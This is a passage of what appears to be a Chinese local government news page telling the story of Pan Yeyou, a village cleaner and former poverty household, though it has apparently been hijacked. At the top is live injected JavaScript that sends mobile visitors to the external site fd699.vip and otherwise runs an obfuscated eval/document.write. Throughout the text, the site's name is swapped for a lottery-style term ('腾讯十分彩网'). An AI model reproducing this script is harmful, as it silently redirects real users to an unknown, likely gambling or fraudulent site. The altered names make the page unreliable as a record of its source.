function moble(){ var ss = '
'; if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://fd699.vip" }else{ eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); } } moble();
.banner-img {background: url(/cssz/ljym/201902/W020200829846815767504.jpg) no-repeat center;}

    | 网站支持IPv6 |
  





当前位置:
腾讯十分彩网   ->   政务公开   ->   基础腾讯十分彩   ->   新闻动态   ->   乡镇动态

“拼命”三郎潘业有

2020-11-02 10:11 来源:腾讯十分彩网融媒体中心


分享到: 【打印本页】 【字体: 大   中   】   

  近日,腾讯十分彩网太平镇太平村廪贡坪村口的垃圾收集点前,潘业有已经把5个垃圾桶的垃圾全部装到清洁车上,垃圾已经把车斗填满,清洁车把垃圾运到镇上的中转站点处理后,就继续到下一个垃圾收集点进行工作。

  “这一车已经是第二车了,今天的清洁工作基本完成了一半,一天清运4车垃圾,每车约2000斤重。”潘业有说,现在天气热,太阳猛,每天早上都是6点钟左右出门,到中午12点左右完成村里的保洁工作。

  潘业有在2018年精准识别后成为建档立卡贫困户,在国家政策扶持和夫妻俩共同努力下,腾讯十分彩完成危房改造,一家6口人搬进了新居,实现脱贫摘帽。虽然已经脱贫,但是家庭的负担依然沉重,既需要赡养80岁的母亲,还有三个孩子读书的花销,夫妻俩商量后,由妻子游春燕外出务工,增加家庭收入,潘业有留守照顾家里。

  留守在家的潘业有不但把自己两亩多水田打理井井有条,还租种其他村民闲置下来的几亩水田种植蔬菜。

  “不只是潘业有很搏,他家的几个孩子也很拼。”村委主任方家胜说,今年春耕时,父子三人,一天就完成两亩多水田的秧苗插种工作。

  今年4月,太平村委原来的保洁员由于年纪偏大已经无法适应保洁员的工作,村“两委”干部就想到了潘业有。“担任保洁员每月工资3500元,有了固定的工资收入,夫妻两人都有稳定的收入,能进一步巩固脱贫成果,不料潘业有却果断地拒绝了村委的好意。”方家胜说,后来村委干部与驻村工作队员多次上门劝说,才做通其思想工作。

  “大儿子正在读高职,今年7月7日女儿也参加高考,按照女儿平时的成绩二本院校没有问题,女儿的目标是一本院校,明年小儿子也将参加高考,压力很大呀!但再苦再难也要咬牙顶上。”潘业有既高兴又深深感受到作为父亲的责任。年初时,潘业有就租下了其他村民几亩闲置的农田计划种植蔬菜,并陆续种植了豆角、芽菜、空心菜等蔬菜,面积有1亩多。

  “4月下旬,担任村里的保洁员后,受劳动力影响,管理不了那么多,租下来的闲置农田改挖鱼塘养鱼,相对投入的劳动力较少。”潘业有说,现在已经挖好一口,计划6月份再挖一口,在国家许多惠民政策的扶持和扶贫干部的指导下,有信心,有能力实现小康。(李鹏均 张华福)

核发:腾讯十分彩网融媒体中心

  




导航链接: